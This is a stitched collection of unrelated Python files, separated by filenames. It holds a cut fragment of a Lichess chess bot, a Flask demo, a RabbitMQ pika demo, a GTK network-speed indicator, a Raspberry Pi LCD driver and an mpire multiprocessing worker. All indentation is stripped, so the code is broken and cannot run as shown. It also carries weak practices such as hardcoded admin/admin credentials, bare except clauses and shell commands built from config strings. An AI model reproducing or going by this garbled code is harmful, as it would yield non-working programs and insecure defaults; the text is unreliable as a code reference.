self.makemove(gameid, bookmove)
self.engine.stop()
self.ponder = None
else:
timecontrol = TimeControl(state["wtime"], state["winc"], state["btime"], state["binc"])
( enginemove, ponder ) = self.getenginemove(board, self.initialboard, moves, timecontrol, self.ponder)
self.ponder = ponder
if enginemove:
print("making engine move", enginemove, "ponder", ponder)
self.makemove(gameid, enginemove)
else:
print("no engine move")
break
except:
print("probblem processing game state event")
pe()
except:
pass
except:
print("stream game exception")
except:
print("problem playing game")
print("finished playing game")
self.engine.stop()
self.playing = False
def streameventstarget(self):
while True:
try:
#print("opening event stream")
r = requests.get("https://lichess.org//api/stream/event", headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/x-ndjson"
}, stream = True)
self.lasttick = time.time()
Thread(target = self.monitoreventstreamtarget, args = (r,)).start()
try:
for line in r.iter_lines():
line = line.decode("utf-8")
try:
event = json.loads(line)
print("bot", json.dumps(event, indent = 2))
try:
kind = event["type"]
if kind == "challenge":
print("incoming challenge")
challenge = event["challenge"]
id = challenge["id"]
challenger = challenge["challenger"]
variant = challenge["variant"]["key"]
speed = challenge["speed"]
if challenger["title"] == "BOT":
print("not accepting bot challenge")
self.challengeaction("decline", id)
elif not ( variant == self.variant ):
print("not accepting variant", variant)
self.challengeaction("decline", id)
elif not ( ( speed == "bullet" ) or ( speed == "blitz" ) ):
print("not accepting speed", speed)
self.challengeaction("decline", id)
elif self.playing:
print("not accepting challenge while playing")
self.challengeaction("decline", id)
else:
print("accepting challenge")
self.challengeaction("accept", id)
elif kind == "gameStart":
self.playgame(event)
except:
print("bot event exception")
except:
self.lasttick = time.time()
except:
print("event stream exception")
print("event stream closed")
except:
print("could no open event stream")
time.sleep(60)
###################################################################
def cleanplayers():
for player in SCAN_PLAYER_LIST.split(","):
print("cleaning player", player)
delfdb(ndjsonpath(player))
delfdb(bookpath(player))
#cleanplayers()
if IS_PROD() and False:
Thread(target = scanplayerstarget).start()
Thread(target = keepalivetarget).start()
#Thread(target = enginetesttarget).start()
Thread(target = initenginetarget).start()
bot = Bot()
#print("serverlogic started, prod", IS_PROD())
#buildplayerbook("sefulesefarka", force = True)
###################################################################
def loadbook(req):
log(f"< load book < {req.player} > >", "info")
bookblob = read_json_from_fdb(bookpath(req.player), None)
return {
"kind": "loadbook",
"bookblob": bookblob
}
|
routes.py
|
from flask import Flask, render_template
from time import sleep
import threading
def waitfn(arg):
for i in range(arg):
with open('foo.txt', 'a') as f:
f.write("i {0}\n".format(i))
sleep(2)
app = Flask(__name__)
@app.route('/')
def home():
return render_template('home.html')
@app.route('/about')
def about():
return render_template('about.html')
def run_server():
thread = threading.Thread(target=waitfn, args=(10, ))
thread.start()
app.run(debug=True, use_reloader=False)
thread.join()
if __name__ == '__main__':
run_server()
|
pika_route.py
|
import random
import threading
import pika
"""
总结:
"""
def send():
tag = random.choice(['info', 'error', 'warn'])
rb_conn = pika.BlockingConnection(pika.ConnectionParameters(host='192.168.101.129',
port=5672,
virtual_host='/',
credentials=pika.PlainCredentials(username='admin',
password='admin')),
)
ch = rb_conn.channel()
ch.exchange_declare(exchange='direct_logs', exchange_type='direct') # create direct exchange
# bind queue
msg = b"hello world"
for n in range(100):
for tag in ['info', 'error', 'warn']:
ch.basic_publish(exchange="direct_logs",
routing_key=tag,
body=msg) # to exchange send message
ch.close()
print('send over')
def recv():
rb_conn = pika.BlockingConnection(pika.ConnectionParameters(host='192.168.101.129',
port=5672,
virtual_host='/',
credentials=pika.PlainCredentials(username='admin',
password='admin')),
)
ch = rb_conn.channel()
ch.exchange_declare('direct_logs', exchange_type='direct')
def callback(ch, method, p, msg):
print(threading.get_ident(), '---', method.routing_key, '---', msg)
queue = ch.queue_declare(queue='', exclusive=True)
queue_name = queue.method.queue
for tag in ['info', 'error', 'warn']:
ch.queue_bind(exchange='direct_logs', queue=queue_name, routing_key=tag)
ch.basic_consume(
queue=queue_name,
on_message_callback=callback,
auto_ack=True
)
ch.start_consuming()
if __name__ == '__main__':
rv = threading.Thread(target=recv)
rv.start()
send()
rv.join()
|
indicator.py
|
#!/bin/env python
# -*- coding: utf-8 -*-
"""Indicator."""
import os
import subprocess
import signal
import json
import gi
import time
from threading import Thread
from urllib2 import Request, urlopen
gi.require_version("Gtk", "3.0")
gi.require_version('AppIndicator3', '0.1')
gi.require_version('Notify', '0.7')
from utilities.dialog import DialogWindow
from gi.repository import Gtk
from gi.repository import AppIndicator3
from gi.repository import GObject
from gi.repository import Notify
APPINDICATOR_ID = 'myappindicator'
global indicator
global menu
global item_download
def main():
"""Main."""
global indicator
indicator = AppIndicator3.Indicator.new(
APPINDICATOR_ID,
'/home/shri/Documents/My/python/kivy/indicator/icons/Git_icon.svg.png',
AppIndicator3.IndicatorCategory.SYSTEM_SERVICES
)
indicator.set_status(AppIndicator3.IndicatorStatus.ACTIVE)
indicator.set_menu(build_menu())
update = Thread(target=net_speed)
# daemonize the thread to make the indicator stopable
update.setDaemon(True)
update.start()
Notify.init(APPINDICATOR_ID)
GObject.threads_init()
signal.signal(signal.SIGINT, signal.SIG_DFL)
Gtk.main()
def build_menu(downloads=None):
"""Build menu"""
global menu
global item_download
menu = Gtk.Menu()
item_joke = Gtk.MenuItem('Joke')
item_joke.connect('activate', joke)
menu.append(item_joke)
bench = Gtk.MenuItem('Create Menu')
bench.connect('activate', create_menu)
menu.append(bench)
item_download = Gtk.MenuItem("downloads")
item_download.connect('activate', joke)
menu.append(item_download)
item_download.show()
try:
with open('data', 'a+') as outfile:
menu_items = json.load(outfile)
except ValueError as e:
print(e)
pass
else:
for menu_item in menu_items:
new_item = Gtk.MenuItem(menu_item['menu'])
new_item.connect('activate', create_command)
menu.append(new_item)
new_item.show()
menu_sep = Gtk.SeparatorMenuItem()
menu.append(menu_sep)
item_quit = Gtk.MenuItem('Quit')
item_quit.connect('activate', quit)
menu.append(item_quit)
# img = Gtk.Image()
# img.set_from_file('/home/shri/Documents/My/python/kivy/indicator/icons/Git_icon.svg.png')
# new = Gtk.ImageMenuItem(Gtk.STOCK_NEW, 'New')
# new.set_image(img)
# new.set_always_show_image(True)
# menu.append(new)
menu.show_all()
return menu
def create_command(_):
"""Create command."""
lable = _.get_label()
with open('data') as outfile:
menu_items = json.load(outfile)
for menu_item in menu_items:
if lable == menu_item['menu']:
print menu_item['command']
command = """gnome-terminal -e 'bash -c
\"{}; bash\" '""".format(menu_item['command'])
status = os.system(command)
if status == 0:
title = "<b>{}</b>".format(lable)
message = "Command {} executed.".format(menu_item['command'])
Notify.Notification.new(
title,
message,
icon=os.path.abspath('icons/frappe.png')
).show()
break
def fetch_joke():
"""Fetch jokes"""
request = Request('http://api.icndb.com/jokes/random?limitTo=[nerdy]')
response = urlopen(request)
joke = json.loads(response.read())['value']['joke']
return joke
def joke(_):
"""Notify joke."""
Notify.Notification.new("<b>Joke</b>", fetch_joke(), None).show()
def create_menu(_):
"""Start frappe bench."""
win = DialogWindow()
win.show_all()
print _.get_label()
# status = os.system("""gnome-terminal -e 'bash -c
# \"cd /home/shri/frappe-bench && bench start; bash\" '""")
# if status == 0:
# Notify.Notification.new(
# "<b>Frappe</b>",
# "Frappe Started",
# icon='/home/shri/Documents/My/python/kivy/indicator/icons/frappe.png'
# ).show()
def net_speed():
"""Net speed."""
global indicator
global item_download
while True:
try:
net_type = shell_command("route -n | awk 'FNR == 3 {print $8}'")
rx_bytes_command = "cat /sys/class/net/{}/statistics/rx_bytes".format(
net_type
)
tx_bytes_command = "cat /sys/class/net/{}/statistics/tx_bytes".format(
net_type
)
rx_bytes_1 = int(shell_command(rx_bytes_command))
tx_bytes_1 = int(shell_command(tx_bytes_command))
time.sleep(1)
rx_bytes_2 = int(shell_command(rx_bytes_command))
tx_bytes_2 = int(shell_command(tx_bytes_command))
upload_bytes = tx_bytes_2 - tx_bytes_1
if upload_bytes < 1024:
uploads = "{}bytes/s".format(upload_bytes)
if upload_bytes >= 1024:
upload_bytes = upload_bytes // 1024
uploads = "{}KiB/s".format(upload_bytes)
if upload_bytes >= 1024:
upload_bytes = upload_bytes // 1024
uploads = "{}mb/s".format(upload_bytes // 1024)
download_bytes = rx_bytes_2 - rx_bytes_1
if download_bytes < 1024:
downloads = "{}bytes/s".format(download_bytes)
if download_bytes >= 1024:
download_bytes = download_bytes // 1024
downloads = "{}KiB/s".format(download_bytes)
if download_bytes >= 1024:
download_bytes = download_bytes // 1024
downloads = "{}mb/s".format(download_bytes // 1024)
message = "dl: {}".format(downloads)
GObject.idle_add(
indicator.set_label,
message, APPINDICATOR_ID,
priority=GObject.PRIORITY_DEFAULT
)
# item_download = Gtk.MenuItem(downloads)
# item_download.connect('activate', quit)
# menu.append(item_download)
item_download.get_child().set_text("up: {0}".format(uploads))
item_download.show()
except ValueError as e:
print e
time.sleep(2)
message = "up: {0}kbps".format(0)
GObject.idle_add(
indicator.set_label,
message, APPINDICATOR_ID,
priority=GObject.PRIORITY_DEFAULT
)
set_icon(0, 0)
else:
set_icon(upload_bytes, download_bytes)
def set_icon(upload, download):
"""Set icon."""
global indicator
if upload == 0 and download == 0:
icon = os.path.abspath('icons/gnome-netstatus-idle.svg')
elif upload == 0:
icon = os.path.abspath('icons/gnome-netstatus-rx.svg')
elif download == 0:
icon = os.path.abspath('icons/gnome-netstatus-tx.svg')
else:
icon = os.path.abspath('icons/gnome-netstatus-rx-tx.svg')
indicator.set_icon_full(icon, "")
def shell_command(cmd):
"""Run shell command."""
try:
response = subprocess.Popen(
cmd,
shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
).stdout.read()
except ValueError as e:
raise e
return response.rstrip('\n')
def quit(_):
"""Quit."""
Notify.uninit()
Gtk.main_quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_DFL)
main()
|
raspberrySpyLcd.py
|
#!/usr/bin/python
#
# HD44780 LCD Test Script for
# Raspberry Pi
#
# Author : Matt Hawkins, refactored into class with scrolling support
# Site : http://www.raspberrypi-spy.co.uk
#
# Date : 26/07/2012
# - updated for 4x20 originally did 2x16
import os
import sys
import syslog
import threading
import RPi.GPIO as GPIO
import time
class raspberrySpyLcd:
def __init__(self,backlightTimeout=5):
# The wiring for the LCD is as follows:
# 1 : GND
# 2 : 5V
# 3 : Contrast (0-5V)*
# 4 : RS (Register Select)
# 5 : R/W (Read Write) - GROUND THIS PIN
# 6 : Enable or Strobe
# 7 : Data Bit 0 - NOT USED
# 8 : Data Bit 1 - NOT USED
# 9 : Data Bit 2 - NOT USED
# 10: Data Bit 3 - NOT USED
# 11: Data Bit 4
# 12: Data Bit 5
# 13: Data Bit 6
# 14: Data Bit 7
# 15: LCD Backlight +5V**
# 16: LCD Backlight GND
GPIO.setwarnings(False)
self.dbg=1
# Define GPIO to LCD mapping
self.LCD_RS = 7 # 26 #7
self.LCD_E = 8 #24 #8
self.LCD_D4 = 25 # 22 #25
self.LCD_D5 = 24 # 18 #24
self.LCD_D6 = 23 # 16 #23
self.LCD_D7 = 18 # 12 #18
# Define some device constants
self.LCD_WIDTH = 20 # Maximum characters per line
self.LCD_CHR = True
self.LCD_CMD = False
self.LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
self.LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
self.LCD_LINE_3 = 0x94
self.LCD_LINE_4 = 0xD4
self.lines=[self.LCD_LINE_1,self.LCD_LINE_2,self.LCD_LINE_3,self.LCD_LINE_4]
# Timing constants
self.E_PULSE = 0.00005 # was 15 now 29
self.E_DELAY = 0.00005 # was 15 now 2 9
# Backlight PI
self.LCD_BACKLIGHT= 11 #transistor
self.LCD_BACKLIGHT_TRIGGER_1 = 9
self.LCD_BACKLIGHT_TRIGGER_2 = 10
self.LCD_BACKLIGHT_TRIGGER_3 = 22#17
self.LCD_BACKLIGHT_TRIGGER_4 = 27#17
self.LCD_BACKLIGHT_TRIGGER_5 = 17#17
self.backlightTimeout=backlightTimeout
self.backlightTimer=self.backlightTimeout+time.time()
self.backlight=False
GPIO.setmode(GPIO.BCM) # Use BOARD GPIO numbers rather GPIO numbers
GPIO.setup(self.LCD_E, GPIO.OUT) # E
GPIO.setup(self.LCD_RS, GPIO.OUT) # RS
GPIO.setup(self.LCD_D4, GPIO.OUT) # DB4
GPIO.setup(self.LCD_D5, GPIO.OUT) # DB5
GPIO.setup(self.LCD_D6, GPIO.OUT) # DB6
GPIO.setup(self.LCD_D7, GPIO.OUT) # DB7
if self.LCD_BACKLIGHT:
GPIO.setup(self.LCD_BACKLIGHT, GPIO.OUT) # backlight transistor pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_1, GPIO.IN,pull_up_down=GPIO.PUD_UP) # backlight trigger pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_2, GPIO.IN,pull_up_down=GPIO.PUD_UP) # backlight trigger pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_3, GPIO.IN, pull_up_down=GPIO.PUD_UP) # backlight trigger pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_4, GPIO.IN, pull_up_down=GPIO.PUD_UP) # backlight trigger pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_5, GPIO.IN,pull_up_down=GPIO.PUD_UP) # backlight trigger pin
self.reinitDisplay()
self.busy=[False,False,False,False]
self.shutdown=False
self.interruptMessage=["","","",""]
self.importance=[-1,-1,-1,-1]
self.useSyslog=False
self._log("raspberrySpyLcd Started")
if self.LCD_BACKLIGHT:
self.backlightThread = threading.Thread(target=self._backlightTimer)
self.backlightThread.daemon = True
self.backlightThread.start()
self.backlightTriggerThread = threading.Thread(target=self._backlightTrigger)
self.backlightTriggerThread.daemon = True
self.backlightTriggerThread.start()
def __del__(self):
self.shutdown=True
self._lcdByte(self.lines[0], self.LCD_CMD)
self._lcdString( "-"*self.LCD_WIDTH )
self._lcdByte(self.lines[1], self.LCD_CMD)
self._lcdString( "-"*self.LCD_WIDTH )
def _log(self,msg):
if self.useSyslog:
syslog.syslog(syslog.LOG_DEBUG, "(raspberrySpyLcd) %s" %(msg))
else:
sys.stderr.write("%s\n" %(msg))
def _backlightTrigger(self):
while True:
if os.path.exists("ipc/manual_backlight"):
self._log("Backlight Manual Trigger on IPC")
os.unlink("ipc/manual_backlight")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
if GPIO.input(self.LCD_BACKLIGHT_TRIGGER_1) == True:
self._log("Backlight Manual Trigger on Pin 1")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_2) == True:
self._log("Backlight Manual Trigger on Pin 2")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_3) == True:
self._log("Backlight Manual Trigger on Pin 3")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_4) == True:
self._log("Backlight Manual Trigger on Pin 4")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
elif GPIO.input(self.LCD_BACKLIGHT_TRIGGER_5) == True:
self._log("Backlight Manual Trigger on Pin 5")
self.enableBacklight()
self.backlightTimer=time.time()
time.sleep(10)
time.sleep(0.2)
def _backlightTimer(self):
while True:
if self.backlight:
if self.backlightTimer + self.backlightTimeout < time.time():
self._log("Backlight turning off after %s seconds" %(time.time()-(self.backlightTimer)))
GPIO.output(self.LCD_BACKLIGHT,0)
self.backlight=False
time.sleep(1)
def _doScrollText(self,text,line,autoBlank,doNotScrollToStart,alignCenter,autoWait,cropText,alert,importance):
if len(text) > self.LCD_WIDTH and cropText:
text=text[0:self.LCD_WDITH]
if alignCenter:
if self.dbg: self._log("Showing cropped message %s (center align)" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
l=int((self.LCD_WIDTH-len(text))/2)
self._lcdString("%s%s" %(" "*l,text))
else:
if self.dbg: self._log("Showing cropped message %s" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(text)
elif len(text) < self.LCD_WIDTH:
if alignCenter:
if self.dbg: self._log("Showing full message %s (center align)" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
l=int((self.LCD_WIDTH-len(text))/2)
self._lcdString("%s%s" %(" "*l,text))
else:
if self.dbg: self._log("Showing full message %s" %(text))
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(text)
else:
if self.dbg: self._log("...started thread for scroll message %s" %(text))
for c in range((len(text)-self.LCD_WIDTH)+1):
if os.path.exists("ipc/manual_backlight") or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_1) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_2) == False:# or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_3) == False:
if os.path.exists("ipc/manual_backlight"):
os.unlink("ipc/manual_backlight")
print "Triggering interrupt message code here"
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString( self.interruptMessage[line] )
self.busy[line]=False
return
if not self.shutdown:
if alert: self.backlightTimer=time.time()
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString( text[c:] )
for tx in range(4):
if os.path.exists("ipc/manual_backlight") or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_1) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_2) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_3) == False or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_4) or GPIO.input(self.LCD_BACKLIGHT_TRIGGER_5):
if os.path.exists("ipc/manual_backlight"):
os.unlink("ipc/manual_backlight")
print "Triggering interrupt message code here"
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString( self.interruptMessage[line] )
self.busy[line]=False
return
time.sleep(0.1)
if not doNotScrollToStart:
time.sleep(3)
if self.dbg: self._log("...resetting long line to begining" )
if alert: self.backlightTimer=time.time()+autoWait
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(text)
if autoBlank:
if self.dbg: self._log("...waiting %s seconds for autoblank" %(autoBlank))
if alert: self.backlightTimer=time.time()+autoBlank
time.sleep(autoBlank)
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(" "*self.LCD_WIDTH)
if autoWait:
if self.dbg: self._log("...waiting %s seconds for autowait" %(autoWait))
if alert: self.backlightTimer=time.time()+autoWait
time.sleep(autoWait)
self._lcdByte(self.lines[line], self.LCD_CMD)
self._lcdString(" "*self.LCD_WIDTH)
if not autoWait and not autoBlank:
time.sleep(0.135) # must wait a small amount of time
self.busy[line]=False
def reinitDisplay(self):
# Initialise display
self._lcdByte(0x33,self.LCD_CMD)
self._lcdByte(0x32,self.LCD_CMD)
self._lcdByte(0x28,self.LCD_CMD)
self._lcdByte(0x0C,self.LCD_CMD)
self._lcdByte(0x06,self.LCD_CMD)
self._lcdByte(0x01,self.LCD_CMD)
def enableBacklight(self):
self._log("Enabling Backlight")
GPIO.output(self.LCD_BACKLIGHT,1)
self.backlightTimer = time.time()
self.backlight=True
def scrollText(self,text,line=0,autoBlank=0,doNotScrollToStart=1,alignCenter=0,autoWait=0,cropText=0,alert=1,importance=1,onInterruptMessage=""):
"""
text [mandatory]
line [optional, 0 : 1] defaults to first line (0)
autoBlank [optional n] wait 'n' seconds before blanking
doNotScrollToStart [option 0,1] after scrolling a message jump back to the start
alignCenter [optional 0,1] if message fits in the display width align to center
autoWait [optional n] wait at least 'n' seconds before the next message - don't blank afterwards
cropText [optional 0,1] cropText (don't scroll)
alert [optional 0,1] should the backlight timer be reset and the backligh enbaled
importance not implemented
onInterruptMessage what we should display if a scroll is completed
"""
if self.dbg: self._log("Text To Display on Line %s: %s\n" %(line,text))
if line == 0:
self.reinitDisplay()
if importance < 0:
print "Checking if we can cancel the importance flag for line ",line
if -importance == self.importance[line]:
print "yes we cane"
self.importance[line]=-99
print -importance,self.importance[line]
if self.importance[line] > importance:
print "our importance is less than current importance.",importance,self.importance[line],text
return
while self.busy[line]:
if self.dbg: self._log("...Line %s busy\n" %(line))
time.sleep(0.1)
self.busy[line]=True
self.importance[line]= importance
if self.LCD_BACKLIGHT and alert:
self.enableBacklight()
self.interruptMessage[line] = onInterruptMessage
print "if we are interrupted we are going to show",onInterruptMessage," <<<",line
self.scrollerThread = threading.Thread(target=self._doScrollText,args=(text,line,autoBlank,doNotScrollToStart,alignCenter,autoWait,cropText,alert,importance))
self.scrollerThread.daemon=True
self.scrollerThread.start()
time.sleep(0.10)
def _lcdString(self,message):
message = message.ljust(self.LCD_WIDTH," ")
for i in range(self.LCD_WIDTH):
self._lcdByte(ord(message[i]),self.LCD_CHR)
def _lcdByte(self,bits, mode):
# Send byte to data pins
# bits = data
# mode = True for character
# False for command
GPIO.output(self.LCD_RS, mode) # RS
# High bits
GPIO.output(self.LCD_D4, False)
GPIO.output(self.LCD_D5, False)
GPIO.output(self.LCD_D6, False)
GPIO.output(self.LCD_D7, False)
if bits&0x10==0x10:
GPIO.output(self.LCD_D4, True)
if bits&0x20==0x20:
GPIO.output(self.LCD_D5, True)
if bits&0x40==0x40:
GPIO.output(self.LCD_D6, True)
if bits&0x80==0x80:
GPIO.output(self.LCD_D7, True)
# Toggle 'Enable' pin
time.sleep(self.E_DELAY)
GPIO.output(self.LCD_E, True)
time.sleep(self.E_PULSE)
GPIO.output(self.LCD_E, False)
time.sleep(self.E_DELAY)
# Low bits
GPIO.output(self.LCD_D4, False)
GPIO.output(self.LCD_D5, False)
GPIO.output(self.LCD_D6, False)
GPIO.output(self.LCD_D7, False)
if bits&0x01==0x01:
GPIO.output(self.LCD_D4, True)
if bits&0x02==0x02:
GPIO.output(self.LCD_D5, True)
if bits&0x04==0x04:
GPIO.output(self.LCD_D6, True)
if bits&0x08==0x08:
GPIO.output(self.LCD_D7, True)
# Toggle 'Enable' pin
time.sleep(self.E_DELAY)
GPIO.output(self.LCD_E, True)
time.sleep(self.E_PULSE)
GPIO.output(self.LCD_E, False)
time.sleep(self.E_DELAY)
if __name__ == '__main__':
testHarness=True
lcd = raspberrySpyLcd()
try:
lcd.scrollText(sys.argv[1],0)
testHarness=False
except:
pass
try:
lcd.scrollText(sys.argv[2],1)
testHarness=False
except:
pass
try:
time.sleep(int(sys.argv[3]))
except IndexError:
pass
except KeyboardInterrupt:
pass
if not testHarness:
sys.exit(0)
if testHarness:
sys.stderr.write("Test Harness, simple test\n")
lcd.scrollText("Testing, Testing, 1,2,1,2 HD44780",0)
lcd.scrollText("Test script for modified raspberrypi-spy.co.uk script",1)
time.sleep(30)
sys.stderr.write("Test Harness, not backlightt\n")
lcd.scrollText("do not enable",0,alert=0)
lcd.scrollText("backlight",1,alert=0)
time.sleep(15)
sys.stderr.write("Test Harness, with backlight and center line 0\n")
lcd.scrollText("with",0,alert=1,alignCenter=1)
lcd.scrollText("backlight",1,alert=0)
time.sleep(5)
lcd.scrollText("no",0,alert=0,alignCenter=1,autoBlank=3)
lcd.scrollText("backlight",1,alert=0)
time.sleep(50)
time.sleep(5000)
lcd=None
|
worker.py
|
import collections.abc
try:
import dill as pickle
except ImportError:
import pickle
import multiprocessing as mp
import signal
import traceback
import _thread
from datetime import datetime
from functools import partial
from threading import Thread
from typing import Any, Callable, List, Optional, Tuple, Union, Type
try:
import multiprocess
DILL_INSTALLED = True
except ImportError:
DILL_INSTALLED = False
try:
import numpy as np
NUMPY_INSTALLED = True
except ImportError:
np = None
NUMPY_INSTALLED = False
from mpire.comms import NON_LETHAL_POISON_PILL, POISON_PILL, WorkerComms
from mpire.context import FORK_AVAILABLE, MP_CONTEXTS, RUNNING_WINDOWS
from mpire.dashboard.connection_utils import DashboardConnectionDetails, set_dashboard_connection
from mpire.exception import CannotPickleExceptionError, StopWorker
from mpire.insights import WorkerInsights
from mpire.params import WorkerPoolParams
from mpire.tqdm_utils import TqdmConnectionDetails, TqdmManager
from mpire.utils import TimeIt
class AbstractWorker:
"""
A multiprocessing helper class which continuously asks the queue for new jobs, until a poison pill is inserted
"""
def __init__(self, worker_id: int, params: WorkerPoolParams, worker_comms: WorkerComms,
worker_insights: WorkerInsights, tqdm_connection_details: TqdmConnectionDetails,
dashboard_connection_details: DashboardConnectionDetails, start_time: datetime) -> None:
"""
:param worker_id: Worker ID
:param params: WorkerPool parameters
:param worker_comms: Worker communication objects (queues, locks, events, ...)
:param worker_insights: WorkerInsights object which stores the worker insights
:param tqdm_connection_details: Tqdm manager host, and whether the manager is started/connected
:param dashboard_connection_details: Dashboard manager host, port_nr and whether a dashboard is
started/connected
:param start_time: `datetime` object indicating at what time the Worker instance was created and started
"""
super().__init__()
# Parameters
self.worker_id = worker_id
self.params = params
self.worker_comms = worker_comms
self.worker_insights = worker_insights
self.tqdm_connection_details = tqdm_connection_details
self.dashboard_connection_details = dashboard_connection_details
self.start_time = start_time
# Worker state
self.worker_state = {}
# Local variables needed for each worker
self.progress_bar_last_updated = datetime.now()
self.progress_bar_n_tasks_completed = 0
self.max_task_duration_last_updated = datetime.now()
self.max_task_duration_list = self.worker_insights.get_max_task_duration_list(self.worker_id)
# Exception handling variables
if self.params.start_method == 'threading':
ctx = MP_CONTEXTS['threading']
else:
ctx = MP_CONTEXTS['mp_dill' if self.params.use_dill else 'mp'][self.params.start_method]
self.is_running = False
self.is_running_lock = ctx.Lock()
# Register handler for graceful shutdown. This doesn't work on Windows
if not RUNNING_WINDOWS:
signal.signal(signal.SIGUSR1, self._exit_gracefully)
def _exit_gracefully(self, *_) -> None:
"""
This function is called when the main process sends a kill signal to this process. This can only mean another
child process encountered an exception which means we should exit.
If this process is in the middle of running the user defined function we raise a StopWorker exception (which is
then caught by the ``_run_safely()`` function) so we can quit gracefully.
"""
# A rather complex locking and exception mechanism is used here so we can make sure we only raise an exception
# when we should. We want to make sure we only raise an exception when the user function is called. If it is
# running the exception is caught and `run` will return. If it is running and the user function throws another
# exception first, it depends on who obtains the lock first. If `run` obtains it, it will set `running` to
# False, meaning we won't raise and `run` will return. If this function obtains it first it will throw, which
# again is caught by the `run` function, which will return.
self.worker_comms.set_kill_signal_received()
with self.is_running_lock:
if self.is_running:
self.is_running = False
raise StopWorker
def _exit_gracefully_windows(self):
"""
Windows doesn't fully support signals as Unix-based systems do. Therefore, we have to work around it. This
function is started in a thread. We wait for a kill signal (Event object) and interrupt the main thread if we
got it (derived from https://stackoverflow.com/a/40281422). This will raise a KeyboardInterrupt, which is then
caught by the signal handler, which in turn checks if we need to raise a StopWorker.
Note: functions that release the GIL won't be interupted by this procedure (e.g., time.sleep). If graceful
shutdown takes too long the process will be terminated by the main process. If anyone has a better approach for
graceful interrupt in Windows, please create a PR.
"""
while self.worker_comms.is_worker_alive(self.worker_id):
if self.worker_comms.wait_for_exception_thrown(timeout=0.1):
_thread.interrupt_main()
return
def run(self) -> None:
"""
Continuously asks the tasks queue for new task arguments. When not receiving a poisonous pill or when the max
life span is not yet reached it will execute the new task and put the results in the results queue.
"""
# Enable graceful shutdown for Windows. Note that we can't kill threads in Python
if RUNNING_WINDOWS and self.params.start_method != "threading":
signal.signal(signal.SIGINT, self._exit_gracefully)
t = Thread(target=self._exit_gracefully_windows)
t.start()
self.worker_comms.set_worker_alive(self.worker_id)
# Set tqdm and dashboard connection details. This is needed for nested pools and in the case forkserver or
# spawn is used as start method
TqdmManager.set_connection_details(self.tqdm_connection_details)
set_dashboard_connection(self.dashboard_connection_details, auto_connect=False)
try:
# Store how long it took to start up
self.worker_insights.update_start_up_time(self.worker_id, self.start_time)
# Obtain additional args to pass to the function
additional_args = []
if self.params.pass_worker_id:
additional_args.append(self.worker_id)
if self.params.shared_objects is not None:
additional_args.append(self.params.shared_objects)
if self.params.use_worker_state:
additional_args.append(self.worker_state)
# Run initialization function. If it returns True it means an exception occurred and we should exit
if self.params.worker_init and self._run_init_func(additional_args):
return
# Determine what function to call. If we have to keep in mind the order (for map) we use the helper function
# with idx support which deals with the provided idx variable.
func = partial(self._helper_func_with_idx if self.worker_comms.keep_order() else self._helper_func,
partial(self.params.func, *additional_args))
n_tasks_executed = 0
while self.params.worker_lifespan is None or n_tasks_executed < self.params.worker_lifespan:
# Obtain new chunk of jobs
with TimeIt(self.worker_insights.worker_waiting_time, self.worker_id):
next_chunked_args = self.worker_comms.get_task(self.worker_id)
# Force update task insights and progress bar when we got a (non-lethal) poison pill. At this point, we
# know for sure that all results have been processed. In case of a lethal pill we additionally run the
# worker exit function, wait for all the exit results to be obtained, wait for the progress bar to be
# done, and stop. Otherwise, we simply continue
if next_chunked_args == POISON_PILL or next_chunked_args == NON_LETHAL_POISON_PILL:
self._update_task_insights(force_update=True)
self._update_progress_bar(force_update=True)
self.worker_comms.task_done(self.worker_id)
if next_chunked_args == POISON_PILL:
if self.params.worker_exit:
self._run_exit_func(additional_args)
self.worker_comms.wait_until_all_exit_results_obtained()
if self.worker_comms.has_progress_bar():
self.worker_comms.wait_until_progress_bar_is_complete()
return
else:
continue
# When we recieved None this means we need to stop because of an exception in the main process
elif next_chunked_args is None:
return
# Execute jobs in this chunk
try:
results = []
for args in next_chunked_args:
# Try to run this function and save results
results_part, should_return = self._run_func(func, args)
if should_return:
return
results.append(results_part)
# Update progress bar info
self._update_progress_bar()
# Send results back to main process
self.worker_comms.add_results(self.worker_id, results)
n_tasks_executed += len(results)
# In case an exception occurred and we need to return, we want to call task_done no matter what
finally:
self.worker_comms.task_done(self.worker_id)
# Update task insights
self._update_task_insights()
# Max lifespan reached
self._update_task_insights(force_update=True)
self._update_progress_bar(force_update=True)
if self.params.worker_exit and self._run_exit_func(additional_args):
return
# Notify WorkerPool to start a new worker
if self.params.worker_lifespan is not None and n_tasks_executed == self.params.worker_lifespan:
self.worker_comms.signal_worker_restart(self.worker_id)
finally:
self.worker_comms.set_worker_dead(self.worker_id)
